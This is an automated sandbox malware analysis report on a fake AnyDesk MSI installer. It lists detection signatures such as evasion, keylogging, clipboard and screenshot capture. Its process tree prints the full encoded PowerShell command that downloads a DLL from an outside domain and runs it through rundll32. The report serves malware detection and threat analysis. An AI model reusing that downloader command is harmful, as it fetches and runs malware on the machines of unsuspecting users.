Edit tour
Windows
Analysis Report
AnydeskSetup_26b30163.msi
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected MalDoc
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Powershell drops PE file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Found evasive API chain (may stop execution after accessing registry keys)
Classification
- System is w10x64
- msiexec.exe (PID: 8 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\Desktop\ AnydeskSet up_26b3016 3.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
- msiexec.exe (PID: 4312 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: 4767B71A318E201188A0D0A420C8B608) - msiexec.exe (PID: 1592 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 98DB8D4 E6DAAAA17E 94E76B65AC F188B MD5: 12C17B5A5C2A7B97342C362CA467E9A2) - MSI5344.tmp (PID: 2904 cmdline:
"C:\Window s\Installe r\MSI5344. tmp" /Dont Wait /Hide Window pow ershell.ex e -Exec By pass -enc JABmAHIAbw BtACAAPQAg AFMAcABsAG kAdAAtAFAA YQB0AGgAIA AoAEcAZQB0 AC0ASQB0AG UAbQBQAHIA bwBwAGUAcg B0AHkAIAAT IFAAYQB0AG gAIAAiAEgA SwBDAFUAOg BcAFMATwBG AFQAVwBBAF IARQBcAEwA aQB0AGUAcw BvAGYAdABc AEkAbgBzAH QAYQBsAGwA IgApAC4AUA BhAHQAaAAg AC0AbABlAG EAZgA7AA0A CgAkAGQAaQ ByACAAPQAg ACQAZQBuAH YAOgBwAHIA bwBnAHIAYQ BtAGQAYQB0 AGEAOwANAA oAJABmAG4A IAA9ACAAJA BkAGkAcgAg ACsAIAAiAF wAIgAgACsA IAAoAEcAZQ B0AC0AUgBh AG4AZABvAG 0AKQAuAFQA bwBTAHQAcg BpAG4AZwAo ACIAeAA4AC IAKQAgACsA IAAiAC4AZA BhAHQAIgAN AAoAJAB3AG MAIAA9ACAA TgBlAHcALQ BPAGIAagBl AGMAdAAgAF MAeQBzAHQA ZQBtAC4ATg BlAHQALgBX AGUAYgBDAG wAaQBlAG4A dAA7AA0ACg AkAGQAIAA9 ACAAIgBoAH QAdABwAHMA OgAvAC8AZA BvAHcAbgBs AG8AYQBkAC 0AYwBkAG4A LgBjAG8AbQ AiADsADQAK ACQAdwBjAC 4ARABvAHcA bgBsAG8AYQ BkAEYAaQBs AGUAKAAkAG QAIAArACAA IgAvAGQAbw B3AG4AbABv AGEAZAAuAH AAaABwAD8A ZgA9AEwAZA ByAHAALgBk AGwAbAAmAG YAcgBvAG0A PQAiACAAKw AgACQAZgBy AG8AbQAsAC AAJABmAG4A KQA7AA0ACg AkAHIAYQB3 ACAAPQAgAC IATQBaACIA IAArACAAKA BHAGUAdAAt AEMAbwBuAH QAZQBuAHQA IAAtAFAAYQ B0AGgAIAAk AGYAbgAgAC 0AUgBhAHcA KQAuAFIAZQ BtAG8AdgBl ACgAMAAsAC AAMgApADsA DQAKAFMAZQ B0AC0AQwBv AG4AdABlAG 4AdAAgAC0A UABhAHQAaA AgACgAJABm AG4AKQAgAC 0ATgBvAE4A ZQB3AGwAaQ BuAGUAIAAt AFYAYQBsAH UAZQAgACQA cgBhAHcADQ AKAFMAdABh AHIAdAAtAF AAcgBvAGMA ZQBzAHMAIA AtAEYAaQBs AGUAUABhAH QAaAAgAHIA dQBuAGQAbA BsADMAMgAu AGUAeABlAC AALQBBAHIA ZwB1AG0AZQ BuAHQATABp AHMAdAAgAC gAJwAiACcA IAArACAAJA BmAG4AIAAr ACAAJwAiAC wARABsAGwA UgBlAGcAaQ BzAHQAZQBy AFMAZQByAH YAZQByACcA KQA7AA== MD5: 6AAC525CFCDD6D3978C451BBA2BB9CB3)
- powershell.exe (PID: 4440 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Exec Bypa ss -enc JA BmAHIAbwBt ACAAPQAgAF MAcABsAGkA dAAtAFAAYQ B0AGgAIAAo AEcAZQB0AC 0ASQB0AGUA bQBQAHIAbw BwAGUAcgB0 AHkAIAATIF AAYQB0AGgA IAAiAEgASw BDAFUAOgBc AFMATwBGAF QAVwBBAFIA RQBcAEwAaQ B0AGUAcwBv AGYAdABcAE kAbgBzAHQA YQBsAGwAIg ApAC4AUABh AHQAaAAgAC 0AbABlAGEA ZgA7AA0ACg AkAGQAaQBy ACAAPQAgAC QAZQBuAHYA OgBwAHIAbw BnAHIAYQBt AGQAYQB0AG EAOwANAAoA JABmAG4AIA A9ACAAJABk AGkAcgAgAC sAIAAiAFwA IgAgACsAIA AoAEcAZQB0 AC0AUgBhAG 4AZABvAG0A KQAuAFQAbw BTAHQAcgBp AG4AZwAoAC IAeAA4ACIA KQAgACsAIA AiAC4AZABh AHQAIgANAA oAJAB3AGMA IAA9ACAATg BlAHcALQBP AGIAagBlAG MAdAAgAFMA eQBzAHQAZQ BtAC4ATgBl AHQALgBXAG UAYgBDAGwA aQBlAG4AdA A7AA0ACgAk AGQAIAA9AC AAIgBoAHQA dABwAHMAOg AvAC8AZABv AHcAbgBsAG 8AYQBkAC0A YwBkAG4ALg BjAG8AbQAi ADsADQAKAC QAdwBjAC4A RABvAHcAbg BsAG8AYQBk AEYAaQBsAG UAKAAkAGQA IAArACAAIg AvAGQAbwB3 AG4AbABvAG EAZAAuAHAA aABwAD8AZg A9AEwAZABy AHAALgBkAG wAbAAmAGYA cgBvAG0APQ AiACAAKwAg ACQAZgByAG 8AbQAsACAA JABmAG4AKQ A7AA0ACgAk AHIAYQB3AC AAPQAgACIA TQBaACIAIA ArACAAKABH AGUAdAAtAE MAbwBuAHQA ZQBuAHQAIA AtAFAAYQB0 AGgAIAAkAG YAbgAgAC0A UgBhAHcAKQ AuAFIAZQBt AG8AdgBlAC gAMAAsACAA MgApADsADQ AKAFMAZQB0 AC0AQwBvAG 4AdABlAG4A dAAgAC0AUA BhAHQAaAAg ACgAJABmAG 4AKQAgAC0A TgBvAE4AZQ B3AGwAaQBu AGUAIAAtAF YAYQBsAHUA ZQAgACQAcg BhAHcADQAK AFMAdABhAH IAdAAtAFAA cgBvAGMAZQ BzAHMAIAAt AEYAaQBsAG UAUABhAHQA aAAgAHIAdQ BuAGQAbABs ADMAMgAuAG UAeABlACAA LQBBAHIAZw B1AG0AZQBu AHQATABpAH MAdAAgACgA JwAiACcAIA ArACAAJABm AG4AIAArAC AAJwAiACwA RABsAGwAUg BlAGcAaQBz AHQAZQByAF MAZQByAHYA ZQByACcAKQ A7AA== MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - rundll32.exe (PID: 2088 cmdline:
"C:\Window s\system32 \rundll32. exe" "C:\P rogramData \435f8fae. dat",DllRe gisterServ er MD5: 73C519F050C20580F8A62C849D49215A) - rundll32.exe (PID: 2460 cmdline:
"C:\Window s\system32 \rundll32. exe" "C:\P rogramData \435f8fae. dat",DllRe gisterServ er MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- rundll32.exe (PID: 5176 cmdline:
"C:\Window s\system32 \rundll32. exe" "C:\P rogramData \435f8fae. dat",#2 MD5: 73C519F050C20580F8A62C849D49215A) - rundll32.exe (PID: 3720 cmdline:
"C:\Window s\system32 \rundll32. exe" "C:\P rogramData \435f8fae. dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- rundll32.exe (PID: 5064 cmdline:
"C:\Window s\system32 \rundll32. exe" "C:\P rogramData \435f8fae. dat",#2 MD5: 73C519F050C20580F8A62C849D49215A) - rundll32.exe (PID: 3584 cmdline:
"C:\Window s\system32 \rundll32. exe" "C:\P rogramData \435f8fae. dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Avira: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 7_2_04A07390 | |
Source: | Code function: | 7_2_04A07750 | |
Source: | Code function: | 7_2_04A03AA0 | |
Source: | Code function: | 7_2_04A03D50 | |
Source: | Code function: | 9_2_00FC7750 | |
Source: | Code function: | 9_2_00FC3AA0 | |
Source: | Code function: | 9_2_00FC7390 | |
Source: | Code function: | 9_2_00FC3D50 |
Networking |
---|